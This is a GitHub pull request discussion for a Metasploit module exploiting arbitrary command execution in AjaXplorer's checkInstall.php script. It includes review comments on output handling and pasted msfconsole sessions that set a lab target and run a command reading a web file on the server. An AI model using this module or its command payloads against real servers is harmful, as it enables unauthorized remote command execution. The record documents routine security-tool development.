-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add OSVDB-63552 AjaXplorer module (2010) #900
Conversation
Testing! |
print_error("#{peer} - This server may not be vulnerable") | ||
else | ||
print_status("#{peer} - Command output from the server:") | ||
print_line(m[1]) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Using ruby 1.9 I get the output if I modify it to:
print_line(m)
msf exploit(ajaxplorer_checkinstall_exec) > show options Module options (exploit/multi/http/ajaxplorer_checkinstall_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOST 192.168.1.130 yes The target address RPORT 80 yes The target port TARGETURI /AjaXplorer-2.5.5/ yes The base path to AjaXplorer VHOST no HTTP server virtual host Payload options (cmd/unix/generic): Name Current Setting Required Description ---- --------------- -------- ----------- CMD cat /var/www/AjaXplorer-2.5.5/index.php yes The command string to execute Exploit target: Id Name -- ---- 0 AjaXplorer 2.5.5 or older msf exploit(ajaxplorer_checkinstall_exec) > rexploit [*] Reloading module... [*] 192.168.1.130:80 - The server returned: 200 OK [*] 192.168.1.130:80 - Command output from the server:
Working with:
[] Started reverse double handler id
msf exploit(ajaxplorer_checkinstall_exec) > show options Module options (exploit/multi/http/ajaxplorer_checkinstall_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOST 192.168.1.130 yes The target address RPORT 80 yes The target port TARGETURI /AjaXplorer-2.5.5/ yes The base path to AjaXplorer VHOST no HTTP server virtual host Payload options (cmd/unix/generic): Name Current Setting Required Description ---- --------------- -------- ----------- CMD cat /var/www/AjaXplorer-2.5.5/index.php yes The command string to execute Exploit target: Id Name -- ---- 0 AjaXplorer 2.5.5 or older msf exploit(ajaxplorer_checkinstall_exec) > rexploit [*] Reloading module... [*] 192.168.1.130:80 - The server returned: 200 OK [*] 192.168.1.130:80 - Command output from the server: ? [*] Exploit completed, but no session was created. After modify L:101 according to my comment output is printed in my case. Awaiting for sinn3r check and response before merging. |
Because the original script used match()
Corrected. |
This pull request was created on behalf of David Maciejak, who emailed it to our dev mailbox. Old bug.
This module exploits an arbitrary command execution vulnerability in the AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6 are vulnerable.